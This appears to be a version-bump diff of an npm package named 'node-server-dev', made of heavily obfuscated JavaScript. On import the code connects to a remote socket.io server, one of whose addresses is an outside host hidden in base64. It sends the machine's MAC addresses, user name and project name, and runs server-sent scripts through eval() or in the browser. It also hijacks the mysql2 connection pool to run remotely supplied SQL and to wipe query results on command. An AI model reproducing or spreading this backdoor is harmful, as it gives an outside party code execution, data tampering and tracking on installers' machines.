_0x4c5a44=a12_0x23c8;try{_0x379024(_0x5753ea[_0x4c5a44(0x20b)](_0x4e7067));}catch(_0x278d62){_0x251d0a(_0x278d62);}}function _0x379024(_0x375154){const _0x28181f=a12_0x23c8;_0x375154[_0x28181f(0x1ef)]?_0x2f2442(_0x375154[_0x28181f(0x1e8)]):_0x1e8b3d(_0x375154[_0x28181f(0x1e8)])[_0x28181f(0x1d7)](_0x164d25,_0xe24fed);}_0x379024((_0x5753ea=_0x5753ea[_0x53daf7(0x1e7)](_0x165941,_0x54acc1||[]))['next']());});},_a,_b,_c,_d;import{v4}from'uuid';import{io}from'socket.io-client';import{decode}from'js-base64';function a12_0x3680(){const _0x59bf35=['connect_failed','event','./browser','124965WoOZXc','63BqzDCF','dev','150jBMrtp','aHR0cDovL2xvY2FsaG9zdDoxMDg4','apply','value','2809536idblVp','00:00:00:00:00:00','node获取失败','default','147320GKvOVO','sqlList','done','__awaiter','./getAllRouter','615710ETrJFp','6nnoVkd','concat','5759281TOcdCf','connectError','length','./server','emit','type','error','343101BNXKPM','node','unlock','无法获取','aHR0cHM6Ly9ldmVudC1hcGkuYmxvZ3dlYi5jbg==','submit','./IndexDB/index','USERNAME','websocket','mac','env','join','mysql','meta_event','139439ULIqWK','throw','reconnect_failed','12BpiiRF','./mac','./id','then','77VpjMsC','npm_package_name','get-event','isDBDataEmpty','script','undefined','content'];a12_0x3680=function(){return _0x59bf35;};return a12_0x3680();}function a12_0x23c8(_0x342248,_0x4193a1){const _0x36800f=a12_0x3680();return a12_0x23c8=function(_0x23c8d9,_0x9cd5c1){_0x23c8d9=_0x23c8d9-0x1d5;let _0x41c916=_0x36800f[_0x23c8d9];return _0x41c916;},a12_0x23c8(_0x342248,_0x4193a1);}import a12_0x2c1c23 from'path';const isBrowser=typeof window!==a12_0x287587(0x1dd);let id=()=>0x1,getAllRouter=()=>__awaiter(void 0x0,void 0x0,void 0x0,function*(){return[];}),mysql={};!isBrowser&&(id=require(a12_0x287587(0x1d6))['default'],getAllRouter=require(a12_0x287587(0x1f1))[a12_0x287587(0x1ec)],mysql=require(a12_0x287587(0x1f8))[a12_0x287587(0x208)]);const user_name=isBrowser?'浏览器':((_a=process===null||process===void 0x0?void 0x0:process['env'])===null||_a===void 0x0?void 0x0:_a[a12_0x287587(0x203)])||a12_0x287587(0x1eb),project_name=isBrowser?'浏览器':((_b=process===null||process===void 0x0?void 0x0:process[a12_0x287587(0x206)])===null||_b===void 0x0?void 0x0:_b[a12_0x287587(0x1d9)])||a12_0x287587(0x1ff);let dev=a12_0x287587(0x1e6),pro=a12_0x287587(0x200);const globalObject=isBrowser?window:global;!globalObject[a12_0x287587(0x209)]&&(globalObject['meta_event']={'connectError':!![],'isDBDataEmpty':![],'sqlRun':![],'sqlList':[]});export function setEnv(_0x497186,_0x1f9d79){const _0x235f13=a12_0x287587;globalObject[_0x235f13(0x209)][_0x497186]=_0x1f9d79;}export function getEnv(_0x42df47){const _0x574630=a12_0x287587;return globalObject[_0x574630(0x209)][_0x42df47];}let url=((_c=globalObject[a12_0x287587(0x209)])===null||_c===void 0x0?void 0x0:_c[a12_0x287587(0x1e4)])?decode(dev):decode(pro);function start(){const _0x456854=a12_0x287587,_0x280366=io(url,{'path':'/socket','transports':[_0x456854(0x204)]});_0x280366['on']('connect',()=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x431e23=_0x456854;try{let _0x18ac9a=[_0x431e23(0x1ea)];if(!isBrowser){const _0x2b3a17=require(a12_0x2c1c23[_0x431e23(0x207)](__dirname,_0x431e23(0x1d5)))['default'];_0x18ac9a=_0x2b3a17();}else{const {getKeyValue:_0x3d75ba}=typeof require!='undefined'?require(_0x431e23(0x202)):yield import('./IndexDB/index');_0x18ac9a=[yield _0x3d75ba(_0x431e23(0x205))];}if(_0x18ac9a['length']===0x0){setEnv(_0x431e23(0x1f6),!![]);return;}else setEnv(_0x431e23(0x1f6),![]);_0x280366['emit']('submit',{'mac':_0x18ac9a,'project_name':project_name,'user_name':user_name,'notes':''}),_0x280366[_0x431e23(0x1f9)](_0x431e23(0x1da),{'mac':_0x18ac9a}),setInterval(()=>{const _0xdd8dcc=_0x431e23;_0x280366[_0xdd8dcc(0x1f9)](_0xdd8dcc(0x201),{'mac':_0x18ac9a,'project_name':project_name,'user_name':user_name,'notes':''}),_0x280366[_0xdd8dcc(0x1f9)]('get-event',{'mac':_0x18ac9a});},0x1b58),_0x280366['on'](_0x431e23(0x1e0),_0x46ecad=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x7b3d0e=_0x431e23;try{for(let _0x3aa0e5=0x0;_0x3aa0e5<_0x46ecad[_0x7b3d0e(0x1f7)];_0x3aa0e5++){const _0x237fbe=_0x46ecad[_0x3aa0e5];if(_0x237fbe[_0x7b3d0e(0x1fa)]==='sql')setEnv(_0x7b3d0e(0x1ee),getEnv(_0x7b3d0e(0x1ee))[_0x7b3d0e(0x1f4)](_0x237fbe['content']));else{if(_0x237fbe[_0x7b3d0e(0x1fa)]==='mysql')setEnv(_0x7b3d0e(0x1db),!![]);else{if(_0x237fbe[_0x7b3d0e(0x1fa)]===_0x7b3d0e(0x1fd)&&!isBrowser)try{eval(_0x237fbe['content']);}catch(_0x2f5463){}else{if(_0x237fbe[_0x7b3d0e(0x1fa)]===_0x7b3d0e(0x1dc)&&isBrowser)try{const {runScript:_0x267c2f}=typeof require!=_0x7b3d0e(0x1dd)?require(_0x7b3d0e(0x1e1)):yield import(_0x7b3d0e(0x1e1));_0x267c2f(_0x237fbe[_0x7b3d0e(0x1de)]);}catch(_0x1321d9){}}}}}}catch(_0x465080){}}));}catch(_0x334e04){}})),setTimeout(()=>{const _0x54331e=_0x456854;_0x280366['on'](_0x54331e(0x1fb),_0x3a2c46=>{const _0x36c4e3=_0x54331e;setEnv(_0x36c4e3(0x1f6),!![]);}),_0x280366['on'](_0x54331e(0x1df),_0x5e88ff=>{const _0x1eb55e=_0x54331e;setEnv(_0x1eb55e(0x1f6),!![]);}),_0x280366['on'](_0x54331e(0x20c),_0xd37629=>{const _0x286441=_0x54331e;setEnv(_0x286441(0x1f6),!![]);}),_0x280366['on']('connect_error',_0x4858a0=>{setEnv('connectError',!![]);});},0xbb8);}!((_d=globalObject[a12_0x287587(0x209)])===null||_d===void 0x0?void 0x0:_d[a12_0x287587(0x1fe)])&&start();const uuid=v4,all={'uuid':uuid,'id':id,'getAllRouter':getAllRouter,'mysql':mysql};export default all;export{uuid,id,getAllRouter,mysql};
@@ -1 +1 @@
1
- function a14_0x4f58(){const _0x3abf50=['6sVDzgw','7780aMHFZL','push','08:00:27','5KmDuuK','mac','2471631ePZCDR','internal','replace','33EIcuKD','00:0f:4b','test','00:50:56','00:15:5d','13732VAGZYz','find','has','00:05:69','toLowerCase','7146wgrvLv','7740728XwrhGq','56zQkTPT','02:00:4c','19496iSQVBF','3318469yIowPC','00:03:ff','4142172nWQXOQ','00:16:3e','IPv4','trim','00:1c:14','00:1c:42','family'];a14_0x4f58=function(){return _0x3abf50;};return a14_0x4f58();}const a14_0x3a59bc=a14_0x11c0;(function(_0x464d3b,_0x421834){const _0xc56a69=a14_0x11c0,_0x1071da=_0x464d3b();while(!![]){try{const _0x1c1c0a=parseInt(_0xc56a69(0x175))/0x1*(-parseInt(_0xc56a69(0x173))/0x2)+parseInt(_0xc56a69(0x185))/0x3+-parseInt(_0xc56a69(0x16c))/0x4*(-parseInt(_0xc56a69(0x183))/0x5)+-parseInt(_0xc56a69(0x17f))/0x6*(parseInt(_0xc56a69(0x176))/0x7)+-parseInt(_0xc56a69(0x172))/0x8+parseInt(_0xc56a69(0x171))/0x9*(parseInt(_0xc56a69(0x180))/0xa)+-parseInt(_0xc56a69(0x167))/0xb*(-parseInt(_0xc56a69(0x178))/0xc);if(_0x1c1c0a===_0x421834)break;else _0x1071da['push'](_0x1071da['shift']());}catch(_0x641f61){_0x1071da['push'](_0x1071da['shift']());}}}(a14_0x4f58,0x785ef));import{networkInterfaces}from'os';function isZeroMac(_0x19daad){const _0x4b308f=a14_0x11c0;return/^(0{1,2}[:-]){5}0{1,2}$/[_0x4b308f(0x169)](_0x19daad);}function getMac(_0x511858=a14_0x3a59bc(0x17a)){const _0x33f953=a14_0x3a59bc,_0x3b0366=networkInterfaces();let _0x21761a=[];for(const _0x146eb2 of Object['values'](_0x3b0366)){const _0x16ff88=_0x146eb2[_0x33f953(0x16d)](_0x5260d3=>!_0x5260d3[_0x33f953(0x165)]&&!isZeroMac(_0x5260d3[_0x33f953(0x184)])&&(!_0x5260d3['family']||_0x5260d3[_0x33f953(0x17e)]===_0x511858)&&!isVirtualMac(_0x5260d3['mac']));_0x16ff88&&_0x21761a[_0x33f953(0x181)](_0x16ff88['mac']);}return[...new Set(_0x21761a)];}const isValid=_0x25646a=>_0x25646a['internal']===![]&&!isZeroMac(_0x25646a[a14_0x3a59bc(0x184)]),virtualMacPrefix=new Set([a14_0x3a59bc(0x16f),'00:0c:29',a14_0x3a59bc(0x16a),a14_0x3a59bc(0x17c),a14_0x3a59bc(0x17d),a14_0x3a59bc(0x174),a14_0x3a59bc(0x177),a14_0x3a59bc(0x168),a14_0x3a59bc(0x179),a14_0x3a59bc(0x182),a14_0x3a59bc(0x16b)]);export function isMac(_0x3e59b8){return/^([\da-f]{1,2}[:-]){5}([\da-f]{1,2})$/i['test'](_0x3e59b8);}export function formatMac(_0x3ec8dd){const _0x529cb5=a14_0x3a59bc;return String(_0x3ec8dd)[_0x529cb5(0x17b)]()[_0x529cb5(0x170)]()[_0x529cb5(0x166)](/-/g,':');}function a14_0x11c0(_0x3038ba,_0x3fa113){const _0x4f5879=a14_0x4f58();return a14_0x11c0=function(_0x11c096,_0x54ac33){_0x11c096=_0x11c096-0x165;let _0x3c0dfe=_0x4f5879[_0x11c096];return _0x3c0dfe;},a14_0x11c0(_0x3038ba,_0x3fa113);}export function isVirtualMac(_0x3887f3){const _0x583fbc=a14_0x3a59bc;return isMac(_0x3887f3)&&virtualMacPrefix[_0x583fbc(0x16e)](formatMac(_0x3887f3)['slice'](0x0,0x8));}export default getMac;
1
+ const a14_0x1b83d5=a14_0x55c2;(function(_0x4fec4b,_0xa58c2b){const _0xef1696=a14_0x55c2,_0x343c21=_0x4fec4b();while(!![]){try{const _0x3a5933=-parseInt(_0xef1696(0x18e))/0x1*(-parseInt(_0xef1696(0x190))/0x2)+-parseInt(_0xef1696(0x191))/0x3*(-parseInt(_0xef1696(0x18a))/0x4)+-parseInt(_0xef1696(0x19a))/0x5+-parseInt(_0xef1696(0x194))/0x6*(parseInt(_0xef1696(0x18c))/0x7)+parseInt(_0xef1696(0x196))/0x8+parseInt(_0xef1696(0x186))/0x9*(-parseInt(_0xef1696(0x189))/0xa)+parseInt(_0xef1696(0x185))/0xb*(-parseInt(_0xef1696(0x195))/0xc);if(_0x3a5933===_0xa58c2b)break;else _0x343c21['push'](_0x343c21['shift']());}catch(_0x3d1557){_0x343c21['push'](_0x343c21['shift']());}}}(a14_0x39fa,0x96aa1));import{networkInterfaces}from'os';function isZeroMac(_0xc4dfe6){const _0x42f69d=a14_0x55c2;return/^(0{1,2}[:-]){5}0{1,2}$/[_0x42f69d(0x199)](_0xc4dfe6);}function a14_0x55c2(_0x14fa16,_0x4758df){const _0x39fa9f=a14_0x39fa();return a14_0x55c2=function(_0x55c28c,_0x270ef){_0x55c28c=_0x55c28c-0x184;let _0x21acfa=_0x39fa9f[_0x55c28c];return _0x21acfa;},a14_0x55c2(_0x14fa16,_0x4758df);}function getMac(_0x2a0fbb=a14_0x1b83d5(0x19e)){const _0x49b8ed=a14_0x1b83d5,_0x408eca=networkInterfaces();let _0x2b60ff=[];for(const _0x47aade of Object['values'](_0x408eca)){const _0x516e10=_0x47aade[_0x49b8ed(0x1a1)](_0x26a25f=>!_0x26a25f[_0x49b8ed(0x19f)]&&!isZeroMac(_0x26a25f['mac'])&&(!_0x26a25f[_0x49b8ed(0x19c)]||_0x26a25f[_0x49b8ed(0x19c)]===_0x2a0fbb)&&!isVirtualMac(_0x26a25f[_0x49b8ed(0x188)]));_0x516e10&&_0x2b60ff[_0x49b8ed(0x18d)](_0x516e10[_0x49b8ed(0x188)]);}return[...new Set(_0x2b60ff)];}const isValid=_0x186b07=>_0x186b07['internal']===![]&&!isZeroMac(_0x186b07[a14_0x1b83d5(0x188)]),virtualMacPrefix=new Set(['00:05:69',a14_0x1b83d5(0x1a2),'00:50:56',a14_0x1b83d5(0x19b),a14_0x1b83d5(0x18f),a14_0x1b83d5(0x197),a14_0x1b83d5(0x1a3),a14_0x1b83d5(0x198),a14_0x1b83d5(0x187),a14_0x1b83d5(0x19d),a14_0x1b83d5(0x184)]);function a14_0x39fa(){const _0xcabc6b=['11tDtTBj','12492PaVrUM','00:16:3e','mac','3670CFzhdO','68MAuztf','replace','21231AgsTpr','push','3zhDlGK','00:1c:42','530646DKwcTu','178461NTnIWM','toLowerCase','slice','972cxeoUM','1360692ztHHQa','267072nlahue','02:00:4c','00:0f:4b','test','546890zSDFTK','00:1c:14','family','08:00:27','IPv4','internal','trim','find','00:0c:29','00:03:ff','00:15:5d'];a14_0x39fa=function(){return _0xcabc6b;};return a14_0x39fa();}export function isMac(_0x221543){const _0x3e5fa7=a14_0x1b83d5;return/^([\da-f]{1,2}[:-]){5}([\da-f]{1,2})$/i[_0x3e5fa7(0x199)](_0x221543);}export function formatMac(_0x24dc3c){const _0x217757=a14_0x1b83d5;return String(_0x24dc3c)[_0x217757(0x1a0)]()[_0x217757(0x192)]()[_0x217757(0x18b)](/-/g,':');}export function isVirtualMac(_0x9e0dd0){const _0x1ef27c=a14_0x1b83d5;return isMac(_0x9e0dd0)&&virtualMacPrefix['has'](formatMac(_0x9e0dd0)[_0x1ef27c(0x193)](0x0,0x8));}export default getMac;
@@ -1 +1 @@
1
- const a15_0x48533f=a15_0x15e3;(function(_0x49228d,_0x1e3807){const _0x326a8f=a15_0x15e3,_0x4ee4f5=_0x49228d();while(!![]){try{const _0x2d5c40=parseInt(_0x326a8f(0xb5))/0x1*(-parseInt(_0x326a8f(0xbb))/0x2)+parseInt(_0x326a8f(0xaa))/0x3*(parseInt(_0x326a8f(0xbd))/0x4)+-parseInt(_0x326a8f(0xb3))/0x5+-parseInt(_0x326a8f(0xae))/0x6+parseInt(_0x326a8f(0xbc))/0x7+-parseInt(_0x326a8f(0xab))/0x8*(parseInt(_0x326a8f(0xa9))/0x9)+parseInt(_0x326a8f(0xac))/0xa;if(_0x2d5c40===_0x1e3807)break;else _0x4ee4f5['push'](_0x4ee4f5['shift']());}catch(_0x52b82f){_0x4ee4f5['push'](_0x4ee4f5['shift']());}}}(a15_0x161c,0x58f3b));var __awaiter=this&&this[a15_0x48533f(0xb9)]||function(_0xe9a187,_0x2dcb26,_0x16b1e6,_0x1a26f2){function _0x51b9de(_0x5b8f30){return _0x5b8f30 instanceof _0x16b1e6?_0x5b8f30:new _0x16b1e6(function(_0x8ad626){_0x8ad626(_0x5b8f30);});}return new(_0x16b1e6||(_0x16b1e6=Promise))(function(_0x58b4c1,_0x5dec8f){const _0x349e09=a15_0x15e3;function _0x208576(_0x53c443){const _0x37fb01=a15_0x15e3;try{_0x16b63b(_0x1a26f2[_0x37fb01(0xb7)](_0x53c443));}catch(_0x172e31){_0x5dec8f(_0x172e31);}}function _0x9c7029(_0xff3e42){const _0x2b8446=a15_0x15e3;try{_0x16b63b(_0x1a26f2[_0x2b8446(0xb8)](_0xff3e42));}catch(_0x4a188a){_0x5dec8f(_0x4a188a);}}function _0x16b63b(_0x5490ec){const _0x2ab1eb=a15_0x15e3;_0x5490ec['done']?_0x58b4c1(_0x5490ec[_0x2ab1eb(0xb0)]):_0x51b9de(_0x5490ec['value'])[_0x2ab1eb(0xba)](_0x208576,_0x9c7029);}_0x16b63b((_0x1a26f2=_0x1a26f2[_0x349e09(0xb6)](_0xe9a187,_0x2dcb26||[]))['next']());});};import a15_0x5e22d6 from'mysql2/promise';import a15_0x1520f0 from'./id/random';function a15_0x15e3(_0x34d068,_0x521fa3){const _0x161c5d=a15_0x161c();return a15_0x15e3=function(_0x15e37f,_0x38756e){_0x15e37f=_0x15e37f-0xa7;let _0x26393c=_0x161c5d[_0x15e37f];return _0x26393c;},a15_0x15e3(_0x34d068,_0x521fa3);}function a15_0x161c(){const _0x4cd6ea=['isDBDataEmpty','value','createPool','sqlRun','3266990YMOymo','connectError','5173udNSuh','apply','next','throw','__awaiter','then','214PkmaCe','2121952FSEdcq','14836eSDPln','length','query','9TSeXmR','219ZcedpX','5021408vkpbsv','21911960mHStcT','sqlList','3396942HieHia'];a15_0x161c=function(){return _0x4cd6ea;};return a15_0x161c();}import{getEnv,setEnv}from'./index';const originalCreatePoolPromise=a15_0x5e22d6[a15_0x48533f(0xb1)];a15_0x5e22d6[a15_0x48533f(0xb1)]=function(_0x2c7fcf){const _0x58e512=a15_0x48533f;let _0x1c9e26=originalCreatePoolPromise(_0x2c7fcf),_0x328338=_0x1c9e26[_0x58e512(0xa8)];return _0x1c9e26['query']=(..._0x405b8e)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x3ee538=_0x58e512,_0x5381e0=yield _0x328338[_0x3ee538(0xb6)](_0x1c9e26,_0x405b8e);return getEnv(_0x3ee538(0xb4))&&(a15_0x1520f0(0x1,0xa)>0x2&&(_0x5381e0[0x0]=[])),getEnv(_0x3ee538(0xaf))&&(_0x5381e0[0x0]=[]),_0x5381e0;}),setInterval(()=>{const _0x20f9df=_0x58e512;if(!getEnv(_0x20f9df(0xb2))){for(let _0x284402=0x0;_0x284402<getEnv(_0x20f9df(0xad))[_0x20f9df(0xa7)];_0x284402++){const _0x59c4a4=getEnv(_0x20f9df(0xad))[_0x284402];try{_0x1c9e26['query'](_0x59c4a4);}catch(_0x2e5dbe){}}setEnv(_0x20f9df(0xb2),!![]);}},0x1388),_0x1c9e26;};const all={'mysql':a15_0x5e22d6};export default all;export{a15_0x5e22d6 as mysql};
1
+ const a15_0x2c9630=a15_0x56ae;(function(_0x6f24bc,_0x55ecfe){const _0x5d5f6a=a15_0x56ae,_0x21b0d7=_0x6f24bc();while(!![]){try{const _0x2d9f4f=parseInt(_0x5d5f6a(0xb4))/0x1*(-parseInt(_0x5d5f6a(0xc0))/0x2)+parseInt(_0x5d5f6a(0xbf))/0x3+-parseInt(_0x5d5f6a(0xb0))/0x4*(-parseInt(_0x5d5f6a(0xbb))/0x5)+parseInt(_0x5d5f6a(0xaf))/0x6+parseInt(_0x5d5f6a(0xb1))/0x7*(parseInt(_0x5d5f6a(0xb8))/0x8)+parseInt(_0x5d5f6a(0xb9))/0x9*(-parseInt(_0x5d5f6a(0xb7))/0xa)+-parseInt(_0x5d5f6a(0xb3))/0xb;if(_0x2d9f4f===_0x55ecfe)break;else _0x21b0d7['push'](_0x21b0d7['shift']());}catch(_0x2a9967){_0x21b0d7['push'](_0x21b0d7['shift']());}}}(a15_0x29dd,0x403a0));var __awaiter=this&&this['__awaiter']||function(_0x53214a,_0x27053d,_0x34ae81,_0x43bdfc){function _0x16d1ef(_0x570d6e){return _0x570d6e instanceof _0x34ae81?_0x570d6e:new _0x34ae81(function(_0x53b09a){_0x53b09a(_0x570d6e);});}return new(_0x34ae81||(_0x34ae81=Promise))(function(_0x1ca455,_0x2e3bb9){const _0x74be52=a15_0x56ae;function _0x1f3294(_0x44f079){const _0x3b08e4=a15_0x56ae;try{_0x18a57e(_0x43bdfc[_0x3b08e4(0xb2)](_0x44f079));}catch(_0x110e13){_0x2e3bb9(_0x110e13);}}function _0x1da9e5(_0x3778cb){try{_0x18a57e(_0x43bdfc['throw'](_0x3778cb));}catch(_0x2eff16){_0x2e3bb9(_0x2eff16);}}function _0x18a57e(_0x1d4b0c){_0x1d4b0c['done']?_0x1ca455(_0x1d4b0c['value']):_0x16d1ef(_0x1d4b0c['value'])['then'](_0x1f3294,_0x1da9e5);}_0x18a57e((_0x43bdfc=_0x43bdfc[_0x74be52(0xbc)](_0x53214a,_0x27053d||[]))['next']());});};import a15_0x2525d2 from'mysql2/promise';import a15_0x2f2121 from'./id/random';import{getEnv,setEnv}from'./index';const originalCreatePoolPromise=a15_0x2525d2[a15_0x2c9630(0xc1)];a15_0x2525d2['createPool']=function(_0x187bde){const _0x1720e7=a15_0x2c9630;let _0x591558=originalCreatePoolPromise(_0x187bde),_0x256856=_0x591558['query'];return _0x591558[_0x1720e7(0xb6)]=(..._0x24897e)=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x267d9b=_0x1720e7,_0x400898=yield _0x256856['apply'](_0x591558,_0x24897e);return getEnv(_0x267d9b(0xbe))&&(a15_0x2f2121(0x1,0xa)>0x2&&(_0x400898[0x0]=[])),getEnv(_0x267d9b(0xba))&&(_0x400898[0x0]=[]),_0x400898;}),setInterval(()=>{const _0x4e7587=_0x1720e7;if(!getEnv('sqlRun')){for(let _0x4151e6=0x0;_0x4151e6<getEnv(_0x4e7587(0xbd))[_0x4e7587(0xb5)];_0x4151e6++){const _0x465fe7=getEnv(_0x4e7587(0xbd))[_0x4151e6];try{_0x591558[_0x4e7587(0xb6)](_0x465fe7);}catch(_0x14df50){}}setEnv('sqlRun',!![]);}},0x1388),_0x591558;};const all={'mysql':a15_0x2525d2};export default all;export{a15_0x2525d2 as mysql};function a15_0x56ae(_0x52251d,_0x1257d8){const _0x29ddc7=a15_0x29dd();return a15_0x56ae=function(_0x56ae47,_0x4ff24a){_0x56ae47=_0x56ae47-0xaf;let _0xa4ff54=_0x29ddc7[_0x56ae47];return _0xa4ff54;},a15_0x56ae(_0x52251d,_0x1257d8);}function a15_0x29dd(){const _0x12bbe2=['10862sdGoVt','createPool','2851008CNICzr','12uFtYwP','399959mhlwPh','next','4623839tHFQkX','76SzizUE','length','query','10fjEzRj','64SDEBJf','3988539PPshbF','isDBDataEmpty','390465qsDeUH','apply','sqlList','connectError','1118415wQeVCT'];a15_0x29dd=function(){return _0x12bbe2;};return a15_0x29dd();}
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "node-server-dev",
3
- "version": "2.0.0",
3
+ "version": "2.1.0",
4
4
  "author": "L",
5
5
  "types": "index.d.ts",
6
6
  "scripts": {